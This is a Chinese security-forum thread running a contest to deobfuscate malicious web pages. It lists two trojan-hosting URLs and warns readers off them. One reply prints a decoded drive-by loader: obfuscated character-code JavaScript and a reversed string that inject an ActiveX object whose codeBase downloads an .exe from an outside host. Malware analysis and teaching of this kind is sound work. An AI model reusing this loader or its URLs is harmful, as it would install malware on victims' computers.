[解密悬赏][第8期][结束]

qianwenxiang

宗旨：
让更多人了解如何解密网马
规则：
1、Hunter不能参加活动
2、上次活动成功解密者，本次活动不能参加
3、必须把所有木马地址全部解出，不完全解密且所发URL之前没有人解出者得到对应网址的25%经验
4、最好有解密软件日志，如果没有，请发出具体解密过程
5、当第一个人成功完全解密后，将根据难度给予其相应经验，所有URL全部解完之后本帖将锁定
6、如果有违反1~2条规则的情况，本帖随即锁定，之后成功解密的作废！
7、锁定后，会重新修改本次的解密地址，并且开帖！



解密地址（替换HXXP为HTTP）：

hXXp://www.oak123.cn/mm/ActivxX.htm (完成)
一次解完（包含解密步骤）=10分
分步（即未解完情况）=每步3分

(共计2个步骤/已完成by vistabull @ 2L)

hXXp://www.pbanking.ru/ (完成)
一次解完（包含解密步骤）=26分
分步（即未解完情况）=每步5分
(共计4个步骤/已完成by 250662772 @ 19L)
有效性：
> 代码: 读取代码:hxxp://www.pbanking.ru/
= 长度:44872成功
> 代码: 读取代码:hxxp://www.oak123.cn/mm/ActivxX.htm
= 长度:1167成功

注意：这些地址含有恶意软件，可能会危害到您的计算机。请不要直接打开，否则因此造成的一切后果我们概不负责！
参考解密工具：
FreShow（英文）、 Redoce 1.5（中文）、malzilla （英文，但是乃神器也）
http://glacierlk.cn/openlab/jm.htm
参考解密教程：
http://bbs.kafan.cn/viewthread.php?tid=387608
http://bbs.kafan.cn/viewthread.php?tid=220550
http://www.jimmyleo.com/share/FreShow!.rar（推荐！不会用FreShow的可以看看）

XMatence

hXXp://www.oak123.cn/mm/ActivxX.htm

沙盘进入

javascript: greysign=document.documentElement.outerHTML;document.write("<body></body>");document.body.innerText=greysign;

得到代码

<HTML><HEAD>
<SCRIPT>
t="60,116,101,120,116,97,114,101,97,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,59,119,105,100,116,104,58,48,112,120,59,104,101,105,103,104,116,58,48,112,120,59,34,32,105,100,61,113,113,50,56,48,48,57,53,57,53,48,62,13,10,10,13,62,116,99,101,106,98,111,47,60,62,34,49,57,49,34,61,116,104,103,105,101,104,32,34,48,48,56,34,61,104,116,100,105,119,32,34,49,44,48,44,48,44,49,61,110,111,105,115,114,101,118,35,101,120,101,46,109,47,109,109,47,110,99,46,51,50,49,107,97,111,46,119,119,119,47,47,58,112,116,116,104,34,61,101,115,97,98,101,100,111,99,32,34,69,48,55,50,57,69,53,66,66,48,57,55,45,48,49,52,57,45,55,51,70,52,45,48,56,67,68,45,55,69,69,68,67,48,69,55,58,100,105,115,108,99,34,61,100,105,115,115,97,108,99,32,116,99,101,106,98,111,60,60,47,116,101,120,116,97,114,101,97,62,60,115,99,114,105,112,116,32,108,97,110,103,117,97,103,101,61,118,98,115,62,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,115,116,114,114,101,118,101,114,115,101,40,113,113,50,56,48,48,57,53,57,53,48,46,118,97,108,117,101,41,41,60,47,115,99,114,105,112,116,62,13,10"
t=eval("String.fromCharCode("+t+")");
document.write(t);</SCRIPT>

<META content=HMDIUJJIVN name=SKYPE_FRAMEID>
<META content=HMDIUJJIVN name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY><TEXTAREA id=qq280095950 style="DISPLAY: none; WIDTH: 0px; HEIGHT: 0px">

&gt;tcejbo/&lt;&gt;"191"=thgieh "008"=htdiw "1,0,0,1=noisrev#exe.m/mm/nc.321kao.www//:ptth"=esabedoc "E0729E5BB097-0149-73F4-08CD-7EEDC0E7:dislc"=dissalc tcejbo&lt;</TEXTAREA>
<SCRIPT language=vbs>document.write(strreverse(qq280095950.value))</SCRIPT>

<OBJECT codeBase=http://www.oak123.cn/mm/m.exe#version=1,0,0,1 height=191 width=800 classid=clsid:7E0CDEE7-DC80-4F37-9410-790BB5E9270E></OBJECT></BODY></HTML>

雨宫优子

malzilla太强大了...

雨宫优子

我的万能法也很强大
2楼那位就是切实学习万能法的好典范...

xiaoxmj

像灰鸽子

zzh161

地一眼看过去，第一个吓了我一跳 隐身娃你太阴险了

XMatence

第二个ie进去死机了～～

qianwenxiang

第一个把你吓一大跳？你那个CACE搞定没。。

雨宫优子

Microsoft 安全性公告 MS06-071
Microsoft XML Core Services 的弱點可能會允許遠端執行程式碼 (928088)
第二个的...

zzh161

我曾经犹豫很久，逆序这个东西有人会用吗？